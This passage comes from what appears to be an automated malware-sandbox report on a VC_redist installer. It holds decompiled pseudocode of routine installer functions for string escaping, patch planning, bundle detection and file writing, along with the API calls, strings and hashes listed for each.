						_t38 = E00043E49(_t40, _t48, L"[]{}");
						if(_t38 == 0) {
							goto L5;
						}
						_t52 = E00011EF2( &_v8, _t48, _t38);
						if(_t52 < 0) {
							_push("Failed to append characters.");
							L14:
							_push(_t52);
							E0005012F();
						} else {
							goto L5;
						}
						L15:
						goto L16;
						L5:
						_t49 =  &(_t48[_t38]);
						_t40 = 0;
						_t24 =  *_t49 & 0x0000ffff;
						if(0 == ( *_t49 & 0x0000ffff)) {
							_t52 = E000121A5(_a8, _v8, 0);
							if(_t52 < 0) {
								_push("Failed to copy string.");
								goto L14;
							}
						} else {
							_t52 = E00011F20( &_v12, L"[\\%c]", _t24);
							_t54 = _t54 + 0xc;
							if(_t52 < 0) {
								_push("Failed to format escape sequence.");
								goto L14;
							} else {
								_t52 = E00011EF2( &_v8, _v12, 0);
								if(_t52 < 0) {
									_push("Failed to append escape sequence.");
									goto L14;
								} else {
									_t48 =  &(_t49[1]);
									continue;
								}
							}
						}
						goto L15;
					}
				} else {
					_push("Failed to allocate buffer for escaped string.");
					_push(_t52);
					E0005012F();
				}
				L16:
				if(_v8 != 0) {
					E000554EF(_v8);
				}
				if(_v12 != 0) {
					E000554EF(_v12);
				}
				return _t52;
			}










                                                                          0x000170d4
                                                                          0x000170d7
                                                                          0x000170d8
                                                                          0x000170d9
                                                                          0x000170dd
                                                                          0x000170e3
                                                                          0x000170f8
                                                                          0x000170fc
                                                                          0x00017111
                                                                          0x0001711c
                                                                          0x00017122
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001712f
                                                                          0x00017133
                                                                          0x00017173
                                                                          0x000171a0
                                                                          0x000171a0
                                                                          0x000171a1
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000171a8
                                                                          0x00000000
                                                                          0x00017135
                                                                          0x00017135
                                                                          0x00017138
                                                                          0x0001713a
                                                                          0x00017140
                                                                          0x00017195
                                                                          0x00017199
                                                                          0x0001719b
                                                                          0x00000000
                                                                          0x0001719b
                                                                          0x00017142
                                                                          0x00017151
                                                                          0x00017153
                                                                          0x00017158
                                                                          0x00017181
                                                                          0x00000000
                                                                          0x0001715a
                                                                          0x00017168
                                                                          0x0001716c
                                                                          0x0001717a
                                                                          0x00000000
                                                                          0x0001716e
                                                                          0x0001716e
                                                                          0x00000000
                                                                          0x0001716e
                                                                          0x0001716c
                                                                          0x00017158
                                                                          0x00000000
                                                                          0x00017140
                                                                          0x000170fe
                                                                          0x000170fe
                                                                          0x00017103
                                                                          0x00017104
                                                                          0x0001710a
                                                                          0x000171a9
                                                                          0x000171ad
                                                                          0x000171b2
                                                                          0x000171b2
                                                                          0x000171bb
                                                                          0x000171c0
                                                                          0x000171c0
                                                                          0x000171cc

                                                                          APIs
                                                                          • lstrlenW.KERNEL32(00000000), ref: 000170E7
                                                                          Strings
                                                                          • Failed to allocate buffer for escaped string., xrefs: 000170FE
                                                                          • Failed to append characters., xrefs: 00017173
                                                                          • Failed to copy string., xrefs: 0001719B
                                                                          • [\%c], xrefs: 00017146
                                                                          • Failed to format escape sequence., xrefs: 00017181
                                                                          • Failed to append escape sequence., xrefs: 0001717A
                                                                          • []{}, xrefs: 00017111
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen
                                                                          • String ID: Failed to allocate buffer for escaped string.$Failed to append characters.$Failed to append escape sequence.$Failed to copy string.$Failed to format escape sequence.$[\%c]$[]{}
                                                                          • API String ID: 1659193697-3250950999
                                                                          • Opcode ID: 00456c2da70b40062fda527180aaa6bd239af1befac3a1f8e7c67e1a3c5329cd
                                                                          • Instruction ID: b13d1309e5fdea5fb31460f1609278cda5e86b71df538876e79e0758d66f5cbb
                                                                          • Opcode Fuzzy Hash: 00456c2da70b40062fda527180aaa6bd239af1befac3a1f8e7c67e1a3c5329cd
                                                                          • Instruction Fuzzy Hash: 65210A33949325BEEB269698DC03FEF76B99F00722F200166FE04B7141DB75AEC49294
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000359B0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 207COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 69%
                                                                          			E000359B0(void* __ecx, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36) {
				intOrPtr _v8;
				intOrPtr _t124;
				void* _t126;
				intOrPtr _t152;
				intOrPtr _t155;
				intOrPtr* _t157;
				signed int _t169;
				signed int _t170;
				intOrPtr _t172;
				signed int _t173;
				signed int _t182;
				signed int _t183;
				intOrPtr* _t194;
				signed int _t196;
				intOrPtr _t197;
				signed int _t199;
				intOrPtr _t202;
				intOrPtr* _t204;
				signed int _t205;
				intOrPtr* _t207;

				_push(__ecx);
				_t169 = _a8;
				_t196 = _a12;
				if(_t169 == 0) {
					_t202 =  *((intOrPtr*)(_t196 + 0x5c));
				} else {
					_t202 =  *((intOrPtr*)(_t196 + 0x64));
				}
				if(_t169 == 0) {
					_t124 =  *((intOrPtr*)(_t196 + 0x60));
				} else {
					_t124 =  *((intOrPtr*)(_t196 + 0x68));
				}
				_a12 = _a12 & 0x00000000;
				_t175 = 0;
				_v8 = _t124;
				_a8 = 0;
				if(_t124 == 0) {
					L14:
					_push( &_a12);
					_push(_t196);
					if(_t169 == 0) {
						_t126 = E00021CAA(_t175);
					} else {
						_t126 = E00021CF1(_t175);
					}
					if(_t126 >= 0) {
						_t204 = _a32;
						 *_a12 = 6;
						 *((intOrPtr*)(_a12 + 0x24)) = _a24;
						 *((intOrPtr*)(_a12 + 8)) = _a28;
						__eflags =  *_t204 - 4;
						 *(_a12 + 0x18) = 0 |  *_t204 == 0x00000004;
						 *((intOrPtr*)(_a12 + 0x20)) = E0003371C( *((intOrPtr*)(_a28 + 0x98)), _a4,  *((intOrPtr*)(_a12 + 0x24)));
						 *((intOrPtr*)(_a12 + 0x10)) =  *((intOrPtr*)(_t204 + 0x58));
						 *((intOrPtr*)(_a12 + 0x14)) =  *((intOrPtr*)(_t204 + 0x5c));
						_t205 = E000121A5(_a12 + 0xc, _t204 + 8, 0);
						__eflags = _t205;
						if(_t205 >= 0) {
							_t182 = _a12;
							__eflags =  *(_t182 + 0x18);
							if( *(_t182 + 0x18) != 0) {
								 *((intOrPtr*)(_t196 + 0xc)) = 1;
							}
							_t197 = _a28;
							_t72 = _t182 + 0x1c; // 0x1c
							E000242BA(_t182, _t197,  *((intOrPtr*)(_t182 + 0xc)), _t169, _a16, _a20, _t72);
							_t183 = _a12;
							goto L23;
						}
						_push("Failed to copy target product code.");
					} else {
						_push("Failed to plan action for target product.");
					}
					goto L28;
				} else {
					_t207 = _t202 + 0x18;
					do {
						_t157 = _t207 - 0x18;
						_a12 = _t157;
						if( *_t157 == 6 &&  *((intOrPtr*)(_t207 + 0xc)) == _a24) {
							_t194 = _a32;
							if( *_t207 != (0 |  *_t194 == 0x00000004)) {
								goto L13;
							}
							if(CompareStringW(0, 0,  *(_t207 - 0xc), 0xffffffff, _t194 + 8, 0xffffffff) == 2) {
								_t175 = _a12;
								__eflags = _a12;
								if(_a12 == 0) {
									goto L14;
								}
								__eflags = _t169;
								if(_t169 != 0) {
									L22:
									_t197 = _a28;
									L23:
									_t41 = _t183 + 0x28; // 0x28
									_t205 = E000138F6(_t41, _t183, _t41,  *((intOrPtr*)(_t183 + 0x2c)) + 1, 8, 2);
									__eflags = _t205;
									if(_t205 >= 0) {
										 *((intOrPtr*)( *((intOrPtr*)(_a12 + 0x28)) +  *(_a12 + 0x2c) * 8)) =  *((intOrPtr*)(_a32 + 4));
										 *((intOrPtr*)( *((intOrPtr*)(_a12 + 0x28)) + 4 +  *(_a12 + 0x2c) * 8)) = _t197;
										 *(_a12 + 0x2c) =  *(_a12 + 0x2c) + 1;
										_t170 = _a12;
										_t199 =  *((intOrPtr*)(_t170 + 0x2c)) - 1;
										__eflags = _t199;
										if(_t199 == 0) {
											L29:
											return _t205;
										} else {
											goto L36;
										}
										while(1) {
											L36:
											_t172 =  *((intOrPtr*)(_t170 + 0x28));
											_t152 =  *((intOrPtr*)(_t172 + _t199 * 8));
											__eflags = _t152 -  *((intOrPtr*)(_t172 + _t199 * 8 - 8));
											if(_t152 >=  *((intOrPtr*)(_t172 + _t199 * 8 - 8))) {
												goto L29;
											}
											 *((intOrPtr*)(_t172 + _t199 * 8 - 8)) = _t152;
											 *((intOrPtr*)(_t172 + _t199 * 8 - 4)) =  *((intOrPtr*)(_t172 + 4 + _t199 * 8));
											_t155 =  *((intOrPtr*)(_a12 + 0x28));
											 *((intOrPtr*)(_t155 + _t199 * 8)) =  *((intOrPtr*)(_t172 + _t199 * 8 - 8));
											 *((intOrPtr*)(_t155 + 4 + _t199 * 8)) =  *((intOrPtr*)(_t172 + _t199 * 8 - 4));
											_t199 = _t199 - 1;
											__eflags = _t199;
											if(_t199 == 0) {
												goto L29;
											}
											_t170 = _a12;
										}
										goto L29;
									}
									_push("Failed grow array of ordered patches.");
									L28:
									_push(_t205);
									E0005012F();
									goto L29;
								}
								__eflags = _a36 - _t169;
								if(__eflags == 0) {
									goto L22;
								}
								_a24 = _a24 & _t169;
								_t173 = _a8;
								_t205 = E00022297(_t175, __eflags, _t173, _t196,  &_a24);
								__eflags = _t205;
								if(_t205 >= 0) {
									 *_a24 = 2;
									 *((intOrPtr*)(_a24 + 8)) = _a36;
									_t36 = _t173 + 1; // 0x1
									_t183 = _t36 * 0x30 +  *((intOrPtr*)(_t196 + 0x5c));
									__eflags = _t183;
									_a12 = _t183;
									goto L22;
								}
								_push("Failed to insert execute action.");
								goto L28;
							}
							_t175 = _a8;
						}
						L13:
						_a12 = _a12 & 0x00000000;
						_t207 = _t207 + 0x30;
						_t175 = _t175 + 1;
						_a8 = _t175;
					} while (_t175 < _v8);
					goto L14;
				}
			}























                                                                          0x000359b3
                                                                          0x000359b5
                                                                          0x000359ba
                                                                          0x000359bf
                                                                          0x000359c6
                                                                          0x000359c1
                                                                          0x000359c1
                                                                          0x000359c1
                                                                          0x000359cb
                                                                          0x000359d2
                                                                          0x000359cd
                                                                          0x000359cd
                                                                          0x000359cd
                                                                          0x000359d5
                                                                          0x000359d9
                                                                          0x000359db
                                                                          0x000359de
                                                                          0x000359e3
                                                                          0x00035a37
                                                                          0x00035a3a
                                                                          0x00035a3b
                                                                          0x00035a3e
                                                                          0x00035ab9
                                                                          0x00035a40
                                                                          0x00035a40
                                                                          0x00035a40
                                                                          0x00035ac2
                                                                          0x00035ae2
                                                                          0x00035ae8
                                                                          0x00035af1
                                                                          0x00035af9
                                                                          0x00035afc
                                                                          0x00035b05
                                                                          0x00035b21
                                                                          0x00035b2a
                                                                          0x00035b33
                                                                          0x00035b46
                                                                          0x00035b48
                                                                          0x00035b4a
                                                                          0x00035b56
                                                                          0x00035b59
                                                                          0x00035b5d
                                                                          0x00035b5f
                                                                          0x00035b5f
                                                                          0x00035b66
                                                                          0x00035b69
                                                                          0x00035b78
                                                                          0x00035b7d
                                                                          0x00000000
                                                                          0x00035b7d
                                                                          0x00035b4c
                                                                          0x00035ac4
                                                                          0x00035ac4
                                                                          0x00035ac4
                                                                          0x00000000
                                                                          0x000359e5
                                                                          0x000359e5
                                                                          0x000359e8
                                                                          0x000359e8
                                                                          0x000359eb
                                                                          0x000359f1
                                                                          0x000359fb
                                                                          0x00035a08
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00035a22
                                                                          0x00035a47
                                                                          0x00035a4a
                                                                          0x00035a4c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00035a4e
                                                                          0x00035a50
                                                                          0x00035a93
                                                                          0x00035a93
                                                                          0x00035a96
                                                                          0x00035a9f
                                                                          0x00035aa8
                                                                          0x00035aaa
                                                                          0x00035aac
                                                                          0x00035b94
                                                                          0x00035ba0
                                                                          0x00035ba7
                                                                          0x00035baa
                                                                          0x00035bb0
                                                                          0x00035bb0
                                                                          0x00035bb3
                                                                          0x00035ad1
                                                                          0x00035ad9
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00035bb9
                                                                          0x00035bb9
                                                                          0x00035bb9
                                                                          0x00035bbc
                                                                          0x00035bbf
                                                                          0x00035bc3
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00035bd1
                                                                          0x00035bd9
                                                                          0x00035be0
                                                                          0x00035be3
                                                                          0x00035be6
                                                                          0x00035bea
                                                                          0x00035bea
                                                                          0x00035bed
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00035bf3
                                                                          0x00035bf3
                                                                          0x00000000
                                                                          0x00035bb9
                                                                          0x00035ab2
                                                                          0x00035ac9
                                                                          0x00035ac9
                                                                          0x00035aca
                                                                          0x00000000
                                                                          0x00035ad0
                                                                          0x00035a52
                                                                          0x00035a55
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00035a57
                                                                          0x00035a5d
                                                                          0x00035a68
                                                                          0x00035a6a
                                                                          0x00035a6c
                                                                          0x00035a7b
                                                                          0x00035a84
                                                                          0x00035a87
                                                                          0x00035a8d
                                                                          0x00035a8d
                                                                          0x00035a90
                                                                          0x00000000
                                                                          0x00035a90
                                                                          0x00035a6e
                                                                          0x00000000
                                                                          0x00035a6e
                                                                          0x00035a24
                                                                          0x00035a24
                                                                          0x00035a27
                                                                          0x00035a27
                                                                          0x00035a2b
                                                                          0x00035a2e
                                                                          0x00035a2f
                                                                          0x00035a32
                                                                          0x00000000
                                                                          0x000359e8

                                                                          APIs
                                                                          • CompareStringW.KERNEL32(00000000,00000000,0005B4F0,000000FF,feclient.dll,000000FF,00000000,00000000,?,?,?,0003659B,?,00000001,?,0005B490), ref: 00035A19
                                                                          Strings
                                                                          • Failed grow array of ordered patches., xrefs: 00035AB2
                                                                          • Failed to plan action for target product., xrefs: 00035AC4
                                                                          • Failed to insert execute action., xrefs: 00035A6E
                                                                          • Failed to copy target product code., xrefs: 00035B4C
                                                                          • feclient.dll, xrefs: 00035A0F, 00035B39
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CompareString
                                                                          • String ID: Failed grow array of ordered patches.$Failed to copy target product code.$Failed to insert execute action.$Failed to plan action for target product.$feclient.dll
                                                                          • API String ID: 1825529933-3477540455
                                                                          • Opcode ID: edf2fa8209736fd6535981276db18e3d0046adc5ffc8f6207b967b0a14a749e1
                                                                          • Instruction ID: 3097142145e2a628942fa713114fa55a00d3a8a55675b243efd0941a2b637de1
                                                                          • Opcode Fuzzy Hash: edf2fa8209736fd6535981276db18e3d0046adc5ffc8f6207b967b0a14a749e1
                                                                          • Instruction Fuzzy Hash: 6B8114B5604B5A9FCB16CF54C880AAA77E9FF08325F15866AEC158B362D730EC51CF90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00039039 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 171COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 75%
                                                                          			E00039039(void* __ecx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12) {
				int _v8;
				intOrPtr _v12;
				short* _t46;
				intOrPtr* _t51;
				void* _t80;
				intOrPtr* _t87;
				intOrPtr _t91;
				intOrPtr* _t92;
				intOrPtr* _t96;
				intOrPtr _t97;
				intOrPtr _t99;
				int _t102;
				void* _t114;

				_push(__ecx);
				_push(__ecx);
				_t99 = _a12;
				_t102 = 0;
				_v8 = 0;
				_t46 =  *(_t99 + 0xbc);
				if(_t46 != 0 && CompareStringW(0, 1, _t46, 0xffffffff,  *(_t99 + 0x10), 0xffffffff) != 2) {
					_t51 =  *((intOrPtr*)(_t99 + 0x40));
					if(_t51 != 0 &&  *_t51 != 0) {
						_t96 = _a8;
						if( *_t96 != 5) {
							__eflags =  *_t96 - 3;
							if( *_t96 == 3) {
								L9:
								__eflags = E00037B00(_t96, _t99, _t51);
								_t80 = 1;
								_t88 =  !=  ? _t80 : 0;
								_v8 =  !=  ? _t80 : 0;
							} else {
								__eflags =  *_t96 - 6;
								if( *_t96 == 6) {
									goto L9;
								} else {
									__eflags =  *_t96 - 7;
									if( *_t96 == 7) {
										goto L9;
									}
								}
							}
						} else {
							_v8 = 1;
						}
					}
					_t91 = 0;
					_a12 = 0;
					if( *((intOrPtr*)(_t99 + 0xb8)) > 0) {
						_t97 = 0;
						_v12 = 0;
						do {
							_t87 =  *((intOrPtr*)(_t99 + 0xb4)) + _t97;
							if( *_t87 != 2) {
								goto L18;
							} else {
								_t114 =  *((intOrPtr*)(_t99 + 0x3c)) -  *((intOrPtr*)(_t87 + 0xc));
								if(_t114 > 0 || _t114 >= 0 &&  *((intOrPtr*)(_t99 + 0x38)) >  *((intOrPtr*)(_t87 + 8))) {
									goto L18;
								} else {
									if(CompareStringW(0, 1,  *(_t99 + 0xbc), 0xffffffff,  *(_t87 + 0x18), 0xffffffff) == 2) {
										_t92 =  *((intOrPtr*)(_a4 + 0x10));
										_a12 =  *((intOrPtr*)( *_t92 + 0x1c))(_t92,  *(_t87 + 0x18),  *_t87,  *((intOrPtr*)(_t87 + 0x10)),  *((intOrPtr*)(_t87 + 0x2c)),  *((intOrPtr*)(_t87 + 8)),  *((intOrPtr*)(_t87 + 0xc)), _v8);
										_t102 = E0001D58B(_a4, 1, _t59);
										__eflags = _t102;
										if(_t102 >= 0) {
											__eflags = _a12 - 1;
											if(__eflags != 0) {
												L27:
												_push(E00023C30( *((intOrPtr*)(_t99 + 0xc4))));
												_push(E000243FA( *((intOrPtr*)(_t87 + 8)),  *((intOrPtr*)(_t87 + 0xc))));
												_push(E000240EF( *((intOrPtr*)(_t87 + 0x2c))));
												_push(E0002416A( *_t87));
												E0001550F(2, 0x2000006b,  *(_t87 + 0x18));
											} else {
												_t39 = _t99 + 0xc8; // 0x4d8
												_t102 = E0003C517(_t92, __eflags, _t39, _a8, 0,  *((intOrPtr*)(_t99 + 0x40)),  *((intOrPtr*)(_t99 + 0xc0)), _t87 + 0x18);
												__eflags = _t102;
												if(_t102 >= 0) {
													__eflags = 1;
													 *((intOrPtr*)(_t99 + 0xc4)) = 1;
													goto L27;
												} else {
													_push("Failed to initialize update bundle.");
													goto L22;
												}
											}
										} else {
											E000137D3(_t62, "detect.cpp", 0x7e, _t102);
											_push("BA aborted detect forward compatible bundle.");
											L22:
											_push(_t102);
											E0005012F();
										}
									} else {
										_t91 = _a12;
										_t97 = _v12;
										goto L18;
									}
								}
							}
							goto L28;
							L18:
							_t91 = _t91 + 1;
							_t97 = _t97 + 0xf8;
							_a12 = _t91;
							_v12 = _t97;
						} while (_t91 <  *((intOrPtr*)(_t99 + 0xb8)));
					}
				}
				L28:
				return _t102;
			}
















                                                                          0x0003903c
                                                                          0x0003903d
                                                                          0x00039041
                                                                          0x00039048
                                                                          0x0003904a
                                                                          0x0003904d
                                                                          0x00039055
                                                                          0x00039077
                                                                          0x0003907c
                                                                          0x00039085
                                                                          0x0003908b
                                                                          0x00039095
                                                                          0x00039098
                                                                          0x000390a4
                                                                          0x000390ab
                                                                          0x000390af
                                                                          0x000390b0
                                                                          0x000390b3
                                                                          0x0003909a
                                                                          0x0003909a
                                                                          0x0003909d
                                                                          0x00000000
                                                                          0x0003909f
                                                                          0x0003909f
                                                                          0x000390a2
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000390a2
                                                                          0x0003909d
                                                                          0x0003908d
                                                                          0x00039090
                                                                          0x00039090
                                                                          0x0003908b
                                                                          0x000390b8
                                                                          0x000390ba
                                                                          0x000390c3
                                                                          0x000390c9
                                                                          0x000390cb
                                                                          0x000390ce
                                                                          0x000390d4
                                                                          0x000390d9
                                                                          0x00000000
                                                                          0x000390db
                                                                          0x000390de
                                                                          0x000390e1
                                                                          0x00000000
                                                                          0x000390ed
                                                                          0x0003910a
                                                                          0x00039138
                                                                          0x0003914d
                                                                          0x0003915a
                                                                          0x0003915c
                                                                          0x0003915e
                                                                          0x0003917f
                                                                          0x00039182
                                                                          0x000391b9
                                                                          0x000391c4
                                                                          0x000391d0
                                                                          0x000391d9
                                                                          0x000391e1
                                                                          0x000391ec
                                                                          0x00039184
                                                                          0x00039197
                                                                          0x000391a3
                                                                          0x000391a5
                                                                          0x000391a7
                                                                          0x000391b2
                                                                          0x000391b3
                                                                          0x00000000
                                                                          0x000391a9
                                                                          0x000391a9
                                                                          0x00000000
                                                                          0x000391a9
                                                                          0x000391a7
                                                                          0x00039160
                                                                          0x00039168
                                                                          0x0003916d
                                                                          0x00039172
                                                                          0x00039172
                                                                          0x00039173
                                                                          0x00039179
                                                                          0x0003910c
                                                                          0x0003910c
                                                                          0x0003910f
                                                                          0x00000000
                                                                          0x0003910f
                                                                          0x0003910a
                                                                          0x000390e1
                                                                          0x00000000
                                                                          0x00039112
                                                                          0x00039112
                                                                          0x00039113
                                                                          0x00039119
                                                                          0x0003911c
                                                                          0x0003911f
                                                                          0x00039127
                                                                          0x000390c3
                                                                          0x000391f4
                                                                          0x000391fc

                                                                          APIs
                                                                          • CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,00000000,00000100,00000000,?,?,?,00026F20,000000B8,0000001C,00000100), ref: 00039068
                                                                          • CompareStringW.KERNEL32(00000000,00000001,?,000000FF,0005B4A8,000000FF,?,?,?,00026F20,000000B8,0000001C,00000100,00000100,00000100,000000B0), ref: 00039101
                                                                          Strings
                                                                          • comres.dll, xrefs: 00039187
                                                                          • detect.cpp, xrefs: 00039163
                                                                          • Failed to initialize update bundle., xrefs: 000391A9
                                                                          • BA aborted detect forward compatible bundle., xrefs: 0003916D
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CompareString
                                                                          • String ID: BA aborted detect forward compatible bundle.$Failed to initialize update bundle.$comres.dll$detect.cpp
                                                                          • API String ID: 1825529933-439563586
                                                                          • Opcode ID: 454e5b4a114acd15431c6248f0a64f0c90c7d730bfad446d27a234804a858ec2
                                                                          • Instruction ID: 6e30da84da91c4c808e308f8f063c332a30f3872cf4c95fe4cbf0e3f0b2de32a
                                                                          • Opcode Fuzzy Hash: 454e5b4a114acd15431c6248f0a64f0c90c7d730bfad446d27a234804a858ec2
                                                                          • Instruction Fuzzy Hash: 5851CF71600212BFDF5A9F64CC85EAAB7AEFF05320F104664F915DA291D771EC60DB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000561FA Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 128fileCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 50%
                                                                          			E000561FA(void* __ecx, intOrPtr _a4, void* _a8, long _a12, void* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr* _a36) {
				signed int _v8;
				signed int _v12;
				signed short _t39;
				void* _t40;
				signed short _t48;
				signed int _t49;
				intOrPtr* _t50;
				void* _t54;
				void* _t60;
				signed int _t61;
				intOrPtr* _t64;
				void* _t67;

				_t62 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t64 = _a12;
				_t67 = E000547D3(__ecx, _a8,  *_t64,  *((intOrPtr*)(_t64 + 4)), 0, 0);
				if(_t67 >= 0) {
					while(1) {
						L2:
						_push( &_v8);
						_push(_a32);
						_push(_a28);
						_push(_a4);
						if( *0x7a974() == 0) {
							break;
						}
						if(_v8 != 0) {
							_t60 = 0;
							_a12 = _a12 & 0;
							while(WriteFile(_a8, _a28 + _t60, _v8 - _t60,  &_a12, 0) != 0) {
								_t60 = _t60 + _a12;
								if(_a12 == 0 || _t60 >= _v8) {
									 *_t64 =  *_t64 + _t60;
									_t49 = 0;
									asm("adc [edi+0x4], eax");
									if(_a16 != 0xffffffff) {
										_t61 = _t49;
										_v12 = _t49;
										if(E000547D3(_t62, _a16, _t49, _t49, _t49, _t49) >= 0) {
											do {
												_push(0);
												_push( &_v12);
												_t54 = 8;
												WriteFile(_a16, _t64 + _t61 * 8, _t54 - _t61, ??, ??);
												_t61 = _t61 + _v12;
											} while (_v12 != 0 && _t61 < 8);
										}
									}
									_t50 = _a36;
									if(_t50 == 0 ||  *_t50 == 0) {
										L15:
										if(_v8 != 0) {
											goto L2;
										} else {
										}
									} else {
										_t67 = E00055B46(_t50,  *_t64,  *((intOrPtr*)(_t64 + 4)), _a20, _a24, _a8);
										if(_t67 >= 0) {
											goto L15;
										}
									}
								} else {
									continue;
								}
								goto L20;
							}
							_t48 = GetLastError();
							_t74 =  <=  ? _t48 : _t48 & 0x0000ffff | 0x80070000;
							_t40 = 0x80004005;
							_t67 =  >=  ? 0x80004005 :  <=  ? _t48 : _t48 & 0x0000ffff | 0x80070000;
							_push(_t67);
							_push(0x1a6);
							L19:
							_push("dlutil.cpp");
							E000137D3(_t40);
						}
						L20:
						goto L21;
					}
					_t39 = GetLastError();
					_t71 =  <=  ? _t39 : _t39 & 0x0000ffff | 0x80070000;
					_t40 = 0x80004005;
					_t67 =  >=  ? 0x80004005 :  <=  ? _t39 : _t39 & 0x0000ffff | 0x80070000;
					_push(_t67);
					_push(0x19a);
					goto L19;
				}
				L21:
				return _t67;
			}















                                                                          0x000561fa
                                                                          0x000561fd
                                                                          0x000561fe
                                                                          0x000561ff
                                                                          0x00056205
                                                                          0x00056219
                                                                          0x0005621d
                                                                          0x00056224
                                                                          0x00056224
                                                                          0x00056227
                                                                          0x00056228
                                                                          0x0005622b
                                                                          0x0005622e
                                                                          0x00056239
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00056243
                                                                          0x00056249
                                                                          0x0005624b
                                                                          0x0005624e
                                                                          0x00056271
                                                                          0x00056278
                                                                          0x0005627f
                                                                          0x00056283
                                                                          0x00056284
                                                                          0x0005628b
                                                                          0x00056294
                                                                          0x00056296
                                                                          0x000562a0
                                                                          0x000562a2
                                                                          0x000562a2
                                                                          0x000562a7
                                                                          0x000562aa
                                                                          0x000562b5
                                                                          0x000562bb
                                                                          0x000562be
                                                                          0x000562a2
                                                                          0x000562a0
                                                                          0x000562c9
                                                                          0x000562ce
                                                                          0x000562ef
                                                                          0x000562f3
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000562f9
                                                                          0x000562d5
                                                                          0x000562e9
                                                                          0x000562ed
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000562ed
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00056278
                                                                          0x000562fb
                                                                          0x0005630c
                                                                          0x0005630f
                                                                          0x00056316
                                                                          0x00056319
                                                                          0x0005631a
                                                                          0x00056345
                                                                          0x00056345
                                                                          0x0005634a
                                                                          0x0005634a
                                                                          0x0005634f
                                                                          0x00000000
                                                                          0x0005634f
                                                                          0x00056321
                                                                          0x00056332
                                                                          0x00056335
                                                                          0x0005633c
                                                                          0x0005633f
                                                                          0x00056340
                                                                          0x00000000
                                                                          0x00056340
                                                                          0x00056350
                                                                          0x00056357

                                                                          APIs
                                                                            • Part of subcall function 000547D3: SetFilePointerEx.KERNELBASE(?,?,?,?,?,00000000,?,?,?,00028564,00000000,00000000,00000000,00000000,00000000), ref: 000547EB
                                                                            • Part of subcall function 000547D3: GetLastError.KERNEL32(?,?,?,00028564,00000000,00000000,00000000,00000000,00000000), ref: 000547F5
                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00055AC5,?,?,?,?,?,?,?,00010000,?), ref: 00056263
                                                                          • WriteFile.KERNEL32(000000FF,00000008,00000008,?,00000000,000000FF,00000000,00000000,00000000,00000000,?,00055AC5,?,?,?,?), ref: 000562B5
